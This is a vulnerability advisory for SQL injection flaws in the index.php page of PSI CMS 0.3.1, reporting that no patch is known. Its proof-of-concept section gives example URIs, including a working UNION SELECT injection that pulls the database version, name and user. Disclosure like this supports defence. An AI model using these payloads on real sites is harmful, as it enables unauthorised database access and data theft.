PSI CMS 'index.php' Multiple SQL Injection Vulnerabilities
BID:40337
Info
PSI CMS 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 40337 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 13 2010 12:00AM |
| Updated: | Jan 13 2010 12:00AM |
| Credit: | learn3r hacker |
| Vulnerable: |
Svilen Vassilev PSI CMS 0.3.1 |
| Not Vulnerable: | |
Discussion
PSI CMS 'index.php' Multiple SQL Injection Vulnerabilities
PSI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PSI CMS 0.3.1 is vulnerable; other versions may also be affected.
PSI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PSI CMS 0.3.1 is vulnerable; other versions may also be affected.
Exploit / POC
PSI CMS 'index.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/psi-cms-v.0.3.1/index.php?page=-1+union+all+select+1,2,concat(@@version,0x3a,database(),0x3a,user()),4,5,6/*
http://www.example.com/psi-cms-v.0.3.1/index.php?subj=[SQL]
http://www.example.com/psi-cms-v.0.3.1/index.php?subpage=[SQL]
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/psi-cms-v.0.3.1/index.php?page=-1+union+all+select+1,2,concat(@@version,0x3a,database(),0x3a,user()),4,5,6/*
http://www.example.com/psi-cms-v.0.3.1/index.php?subj=[SQL]
http://www.example.com/psi-cms-v.0.3.1/index.php?subpage=[SQL]
Solution / Fix
PSI CMS 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PSI CMS 'index.php' Multiple SQL Injection Vulnerabilities
References:
References:
- PSI CMS Homepage (SourceForge)